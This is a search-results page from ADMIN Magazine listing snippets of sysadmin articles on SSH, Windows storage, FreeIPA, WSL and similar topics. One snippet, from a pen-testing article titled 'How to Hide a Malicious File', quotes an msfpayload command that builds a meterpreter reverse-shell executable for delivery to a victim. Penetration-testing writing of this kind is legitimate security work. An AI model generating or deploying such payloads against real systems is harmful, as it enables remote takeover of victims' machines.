Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (861)
  • Article (206)
  • News (82)
  • Blog post (2)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 33 34 35 36 37 38 39 40 41 42 43 44 45 46 ... 116 Next »

19%
Using the Expect scripting environment
30.11.2025
Home »  Archive  »  2011  »  Issue 5: Pen Te...  » 
© Ivan Mikhaylov, 123RF.com
, and root. It sends the current user's public key to the remote host and adds it to the ~/.ssh/authorized_keys file for both remote users. It also changes the SSH configuration for the remote root user
19%
Storage pools and storage spaces in Windows
10.04.2015
Home »  Archive  »  2015  »  Issue 26: OpenS...  » 
Lead Image © Nathalie Diaz, fotolia.com
Microsoft introduced storage pools and storage spaces with Windows 8 and Windows Server 2012. They help combine physical disks with different capacities and technologies, such as USB, SATA, and SAS
19%
The top three SSH tricks
14.08.2017
Home »  Archive  »  2017  »  Issue 40: Lean...  » 
Lead Image © Fotoflash,Fotolia.com
environment. The parameters to change are located in /etc/ssh/sshd_config. The first security change is to deny root user logins by finding the line PermitRootLogin Yes and changing the Yes to No. If you
19%
Certificate management with FreeIPA and Dogtag
02.08.2022
Home »  Archive  »  2022  »  Issue 70: Defen...  » 
Photo by Oscar Sutton on Unsplash
certificate authority (CA) on your intranet to manage and sign certificates for the connected services. Internal computers then only need to trust that this internal root CA for all keys signed
19%
WSL puts Linux on Windows desktops
05.12.2019
Home »  Archive  »  2019  »  Issue 54: NVMe...  » 
Lead Image © Devon, Fotolia.com
between Linux and Windows filesystems through multiple interfaces (source: [5]). The primary WSL filesystem is VolFs. It is used for the root directory of the respective Linux instance. VolFs provides
19%
DebOps delivers easy Ansible automation for Debian-based systems
22.12.2017
Home »  Archive  »  2017  »  Issue 42: Secur...  » 
Lead Image © Chris Dorney, 123RF.com
is not in the data-home directory in DebOps. If you work as root, you can call the debops-init command below /root. The rest of the path is the typical folder structure that Ansible expects (Figure 2
19%
AWS security scans with Scout2
14.03.2018
Home »  Archive  »  2018  »  Issue 44: Cloud...  » 
Lead Image Photo by qinghill on Unsplash
thoughtfully attempts to open a window in a web browser to show the results of your tests, so you need to be a non-root user to install Scout2 (on my Linux Mint laptop, at least). I'm quite happy navigating
19%
Open Hardware 1.0
27.12.2011
Home »  Articles  » 
 
what was at the root of this strong representation of talented women within the OSHW movement, and she indicated that she did not know; otherwise, she would be “doing more of it.” Conclusion Community
19%
How to Hide a Malicious File
09.01.2012
Home »  Articles  » 
 
command: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe All that’s left is to deliver the executable to the victim, which requires some skill
19%
Symbolic Mathematics with Python's SymPy Library
17.10.2018
Home »  HPC  »  Articles  » 
derivative deriv=diff(f(x),x) deriv  + Enter Roots roots=solve(deriv) roots   + Enter 2D plot — plot(f(x),(x,xmin,xmax)) 3D plot

« Previous 1 ... 33 34 35 36 37 38 39 40 41 42 43 44 45 46 ... 116 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2026 Linux New Media USA, LLC – Legal Notice